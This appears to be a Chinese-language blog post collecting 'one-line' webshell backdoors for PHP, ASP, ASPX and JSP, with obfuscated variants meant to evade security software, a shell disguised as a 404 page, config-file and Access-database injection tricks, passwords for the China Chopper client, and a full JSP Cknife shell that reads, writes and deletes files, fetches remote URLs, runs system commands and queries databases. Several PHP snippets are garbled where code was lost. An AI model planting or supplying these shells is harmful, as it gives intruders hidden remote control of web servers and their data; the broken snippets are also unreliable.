各种一句话

PHP一句话:
1、普通一句话


2、防爆破一句话
//菜刀地址http://192.168.64.137/x.php?x=mytest 密码:pass


3、过狗一句话
GET['s']).@$($POST['pass']);?> //菜刀地址 http://localhost/1.php?s=assert
等价于
$
=@$GET['s'];
@$
($_POST['pass']);
?>


4、404隐藏一句话

preg_replace()方法中的e,只适用于php5及更早的版本,php5后的版本已经无法正常使用,



404 Not Found

Not Found


The requested URL was not found on this server.



@preg_replace("/\w/e",$_POST['error'],"e");#preg_replace()方法中的e,只适用于php5及更早的版本,
header('HTTP/1.1 404 Not Found') #php5后的版本已经无法正常使用,
?>



404 Not Found

Not Found


The requested URL was not found on this server.



@eval($_POST['pass']); # @可以不提示错误
header('HTTP/1.1 404 Not Found');
?>


5、不用 ? 号的一句话


6、躲避检测


7、变形一句话后门

8、免杀一句话木马

访问该网页,然后菜刀连接:/myh0st.php 密码:ki11
ASP一句话:


1、普通一句话:

<%eval request("xiasha")%> 或
<%execute(request("ki11"))%>


2、unicode编码的access木马

向access数据库插入 ┼攠數畣整爠煥敵瑳∨≡┩> 编码前:<% execute request("a")%>

然后备份出webshell,密码a

3、配置文件插马(需要条件支持,插入的数据被写在了配置文件中)

插入:"%><% bbbb=request("aaaa")%><%eval(bbbb)%><%' 访问爆错,获取到配置文件的地址,然后连接,密码aaaa

4、不用%的一句话

5、不用”的一句话:

<%eval request(chr(35))%> 密码:#

ASPX一句话:

1、普通一句话

<%@ Page Language="Jscript"%><%eval(Request.Item["ki11"],"unsafe");%>

2、免杀的ASPX一句话

<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["x61x62x63x64"];eval(PAY,"x75x6Ex73x61"+"x66x65");%>

3、又一个免杀的ASPX一句话

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("ki11"))%>

JSP菜刀一句话

%@page import="java.io.,java.util.,java.net.,java.sql.,java.text.*"%>
<%!
String Pwd = "Cknife";
String cs = "UTF-8";

String EC(String s) throws Exception {  
    return new String(s.getBytes("ISO-8859-1"),cs);  
}  
  
Connection GC(String s) throws Exception {  
    String[] x = s.trim().split("choraheiheihei");  
    Class.forName(x[0].trim());  
    if(x[1].indexOf("jdbc:oracle")!=-1){  
        return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);  
    }else{  
        Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);  
        if (x.length > 4) {  
            c.setCatalog(x[4]);  
        }  
        return c;  
    }  
}  
  
void AA(StringBuffer sb) throws Exception {  
    File k = new File("");  
    File r[] = k.listRoots();  
    for (int i = 0; i < r.length; i++) {  
        sb.append(r[i].toString().substring(0, 2));  
    }  
}  
  
void BB(String s, StringBuffer sb) throws Exception {  
    File oF = new File(s), l[] = oF.listFiles();  
    String sT, sQ, sF = "";  
    java.util.Date dt;  
    SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");  
    for (int i = 0; i < l.length; i++) {  
        dt = new java.util.Date(l[i].lastModified());  
        sT = fm.format(dt);  
        sQ = l[i].canRead() ? "R" : "";  
        sQ += l[i].canWrite() ? " W" : "";  
        if (l[i].isDirectory()) {  
            sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n");  
        } else {  
            sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n";  
        }  
    }  
    sb.append(sF);  
}  
  
void EE(String s) throws Exception {  
    File f = new File(s);  
    if (f.isDirectory()) {  
        File x[] = f.listFiles();  
        for (int k = 0; k < x.length; k++) {  
            if (!x[k].delete()) {  
                EE(x[k].getPath());  
            }  
        }  
    }  
    f.delete();  
}  
  
void FF(String s, HttpServletResponse r) throws Exception {  
    int n;  
    byte[] b = new byte[512];  
    r.reset();  
    ServletOutputStream os = r.getOutputStream();  
    BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));  
    os.write(("->" + "|").getBytes(), 0, 3);  
    while ((n = is.read(b, 0, 512)) != -1) {  
        os.write(b, 0, n);  
    }  
    os.write(("|" + "<-").getBytes(), 0, 3);  
    os.close();  
    is.close();  
}  
  
void GG(String s, String d) throws Exception {  
    String h = "0123456789ABCDEF";  
    File f = new File(s);  
    f.createNewFile();  
    FileOutputStream os = new FileOutputStream(f);  
    for (int i = 0; i < d.length(); i += 2) {  
        os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));  
    }  
    os.close();  
}  
  
void HH(String s, String d) throws Exception {  
    File sf = new File(s), df = new File(d);  
    if (sf.isDirectory()) {  
        if (!df.exists()) {  
            df.mkdir();  
        }  
        File z[] = sf.listFiles();  
        for (int j = 0; j < z.length; j++) {  
            HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());  
        }  
    } else {  
        FileInputStream is = new FileInputStream(sf);  
        FileOutputStream os = new FileOutputStream(df);  
        int n;  
        byte[] b = new byte[512];  
        while ((n = is.read(b, 0, 512)) != -1) {  
            os.write(b, 0, n);  
        }  
        is.close();  
        os.close();  
    }  
}  
  
void II(String s, String d) throws Exception {  
    File sf = new File(s), df = new File(d);  
    sf.renameTo(df);  
}  
  
void JJ(String s) throws Exception {  
    File f = new File(s);  
    f.mkdir();  
}  
  
void KK(String s, String t) throws Exception {  
    File f = new File(s);  
    SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");  
    java.util.Date dt = fm.parse(t);  
    f.setLastModified(dt.getTime());  
}  
  
void LL(String s, String d) throws Exception {  
    URL u = new URL(s);  
    int n = 0;  
    FileOutputStream os = new FileOutputStream(d);  
    HttpURLConnection h = (HttpURLConnection) u.openConnection();  
    InputStream is = h.getInputStream();  
    byte[] b = new byte[512];  
    while ((n = is.read(b)) != -1) {  
        os.write(b, 0, n);  
    }  
    os.close();  
    is.close();  
    h.disconnect();  
}  
  
void MM(InputStream is, StringBuffer sb) throws Exception {  
    String l;  
    BufferedReader br = new BufferedReader(new InputStreamReader(is));  
    while ((l = br.readLine()) != null) {  
        sb.append(l + "\r\n");  
    }  
}  
  
void NN(String s, StringBuffer sb) throws Exception {  
    Connection c = GC(s);  
    ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();  
    while (r.next()) {  
        sb.append(r.getString(1) + "\t|\t\r\n");  
    }  
    r.close();  
    c.close();  
}  
  
void OO(String s, StringBuffer sb) throws Exception {  
    Connection c = GC(s);  
    String[] x = s.trim().split("choraheiheihei");  
    ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"});  
    while (r.next()) {  
        sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n");  
    }  
    r.close();  
    c.close();  
}  
  
void PP(String s, StringBuffer sb) throws Exception {  
    String[] x = s.trim().split("\r\n");  
    Connection c = GC(s);  
    Statement m = c.createStatement(1005, 1007);  
    ResultSet r = m.executeQuery("select * from " + x[x.length-1]);  
    ResultSetMetaData d = r.getMetaData();  
    for (int i = 1; i <= d.getColumnCount(); i++) {  
        sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t");  
    }  
    r.close();  
    m.close();  
    c.close();  
}  
  
void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {  
    Connection c = GC(s);  
    Statement m = c.createStatement(1005, 1008);  
    BufferedWriter bw = null;  
    try {  
        ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);  
        ResultSetMetaData d = r.getMetaData();  
        int n = d.getColumnCount();  
        for (int i = 1; i <= n; i++) {  
            sb.append(d.getColumnName(i) + "\t|\t");  
        }  
        sb.append("\r\n");  
        if(q.indexOf("--f:")!=-1){  
            File file = new File(p);  
            if(q.indexOf("-to:")==-1){  
                file.mkdir();  
            }  
            bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs));  
        }  
        while (r.next()) {  
            for (int i = 1; i <= n; i++) {  
                if(q.indexOf("--f:")!=-1){  
                    bw.write(r.getObject(i)+""+"\t");  
                    bw.flush();  
                }else{  
                    sb.append(r.getObject(i)+"" + "\t|\t");  
                }  
            }  
            if(bw!=null){bw.newLine();}  
            sb.append("\r\n");  
        }  
        r.close();  
        if(bw!=null){bw.close();}  
    } catch (Exception e) {  
        sb.append("Result\t|\t\r\n");  
        try {  
            m.executeUpdate(q);  
            sb.append("Execute Successfully!\t|\t\r\n");  
        } catch (Exception ee) {  
            sb.append(ee.toString() + "\t|\t\r\n");  
        }  
    }  
    m.close();  
    c.close();  
}  

%>
<%

//String Z = EC(request.getParameter(Pwd) + "", cs);

cs = request.getParameter("code") != null ? request.getParameter("code")+ "":cs;  
request.setCharacterEncoding(cs);  
response.setContentType("text/html;charset=" + cs);  
StringBuffer sb = new StringBuffer("");  

if (request.getParameter(Pwd) != null) {

try {  
    String Z = EC(request.getParameter("action") + "");  
    String z1 = EC(request.getParameter("z1") + "");  
    String z2 = EC(request.getParameter("z2") + "");  
    sb.append("->" + "|");  
    String s = request.getSession().getServletContext().getRealPath("/");  
    if (Z.equals("A")) {  
        sb.append(s + "\t");  
        if (!s.substring(0, 1).equals("/")) {  
            AA(sb);  
        }  
    } else if (Z.equals("B")) {  
        BB(z1, sb);  
    } else if (Z.equals("C")) {  
        String l = "";  
        BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));  
        while ((l = br.readLine()) != null) {  
            sb.append(l + "\r\n");  
        }  
        br.close();  
    } else if (Z.equals("D")) {  
        BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));  
        bw.write(z2);  
        bw.close();  
        sb.append("1");  
    } else if (Z.equals("E")) {  
        EE(z1);  
        sb.append("1");  
    } else if (Z.equals("F")) {  
        FF(z1, response);  
    } else if (Z.equals("G")) {  
        GG(z1, z2);  
        sb.append("1");  
    } else if (Z.equals("H")) {  
        HH(z1, z2);  
        sb.append("1");  
    } else if (Z.equals("I")) {  
        II(z1, z2);  
        sb.append("1");  
    } else if (Z.equals("J")) {  
        JJ(z1);  
        sb.append("1");  
    } else if (Z.equals("K")) {  
        KK(z1, z2);  
        sb.append("1");  
    } else if (Z.equals("L")) {  
        LL(z1, z2);  
        sb.append("1");  
    } else if (Z.equals("M")) {  
        String[] c = { z1.substring(2), z1.substring(0, 2), z2 };  
        Process p = Runtime.getRuntime().exec(c);  
        MM(p.getInputStream(), sb);  
        MM(p.getErrorStream(), sb);  
    } else if (Z.equals("N")) {  
        NN(z1, sb);  
    } else if (Z.equals("O")) {  
        OO(z1, sb);  
    } else if (Z.equals("P")) {  
        PP(z1, sb);  
    } else if (Z.equals("Q")) {  
        QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/");  
    }  
} catch (Exception e) {  
    sb.append("ERROR" + ":// " + e.toString());  
}  
sb.append("|" + "<-");  
out.print(sb.toString());  

}
%>


过狗变异一句话木马,密码025
Asp

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

Aspx

<%@ Page Language = Jscript %>
<%var/-/-/P/-/-/=/-/-/"e"+"v"+/-/-/
"a"+"l"+"("+"R"+"e"+/-/-/"q"+"u"+"e"/-/-/+"s"+"t"+
"[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]"+
","+"""+"u"+"n"+"s"/-/-/+"a"+"f"+"e"+"""+")";eval
(/
-/-/P/-/-/,/-/-/"u"+"n"+"s"/-/-/+"a"+"f"+"e"/-/-/);%>

过狗一句话
<%@ Page Language="Jscript"%><%
var PWD;
var action;
PWD = Request.Item["Cknife"];
action = Request.Item["action"];
if(PWD=="1"){
Response.Write("->|");
if(action=="index"){
var c=System.IO.Directory.GetLogicalDrives();
Response.Write(Server.MapPath(".")+"");
Response.Write("\t");
for(var i=0;i<=c.length-1;i++)
Response.Write(c[i][0]+":");
}
else if(action=="readdict"){
var D=Request.Item["z1"];
var m=new System.IO.DirectoryInfo(D);
var s=m.GetDirectories();
var P:String;
var i;
function T(p:String):String{
return System.IO.File.GetLastWriteTime(p).ToString("yyyy-MM-dd HH:mm:ss");
}
for(i in s){
P=D+s[i].Name;Response.Write(s[i].Name+"/\t"+T(P)+"\t0\t-\n");
}
s=m.GetFiles();
for(i in s){
P=D+s[i].Name;Response.Write(s[i].Name+"\t"+T(P)+"\t"+s[i].Length+"\t-\n");
}
}
else if(action=="readfile"){
var P=Request.Item["z1"];
var m=new System.IO.StreamReader(P,Encoding.Default);
Response.Write(m.ReadToEnd());m.Close();
}
Response.Write("|<-");
}

%>  

Php

@$="s"."s"./-/-/"e"./-/-/"r";
@$
=/-/-/"a"./-/-/$./-/-*/"t";
@$
/-/-/($/-/-/{"_P"./-/-/"OS"./-/-/"T"}
[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]);?>

你可能感兴趣的:(各种一句话)